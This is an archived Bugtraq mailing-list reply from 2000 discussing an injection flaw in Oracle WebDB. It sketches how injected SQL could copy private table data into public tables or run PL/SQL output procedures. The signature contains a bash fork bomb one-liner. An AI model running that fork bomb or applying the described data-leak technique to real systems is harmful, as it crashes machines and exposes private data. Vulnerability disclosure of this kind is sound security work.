Bugtraq mailing list archives
Re: Oracle WebDb engine brain-damagse
From: Michal Zalewski <lcamtuf () DIONE IDS PL>
Date: Fri, 22 Dec 2000 02:10:44 +0100
On Wed, 20 Dec 2000, McAllister, Andrew wrote:
This is not to say that you can't issue some dangerous commands as you suggest, just that you won't see any data as a result. Also, I believe that only data manipulation commands will work in this context e.g. delete, update, insert. I don't believe definition commands will work, e.g. drop, create. Again I don't have WebDB, so I cannot verify.
I believe you can do at least one of these possibilities: - SELECT <pattern> INTO <sth> FROM <table> to move sensitive data from some private table to publicly available tables used eg. for direct contents rendering, - call WebDB output procedures to produce output (you can use full PL/SQL language syntax, including loops, declarations etc).
I don't know this product well enough to say the above query will work, but I know of a similar, non-oracle, product that behaves exactly as Michal Zalewski describes. That product vendor was notified moments ago of Michal Zalewski's discovery /.../
Any hints?:) -- _______________________________________________________ Michal Zalewski [lcamtuf () tpi pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =--=> Did you know that clones never use mirrors? <=--=
Current thread:
- Oracle WebDb engine brain-damagse Michal Zalewski (Dec 20)
- <Possible follow-ups>
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 20)
- Re: Oracle WebDb engine brain-damagse McAllister, Andrew (Dec 20)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse sporty o'one (Dec 22)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse Michal Zalewski (Dec 22)
- Re: Oracle WebDb engine brain-damagse Kuznetsov, Vasily (Dec 21)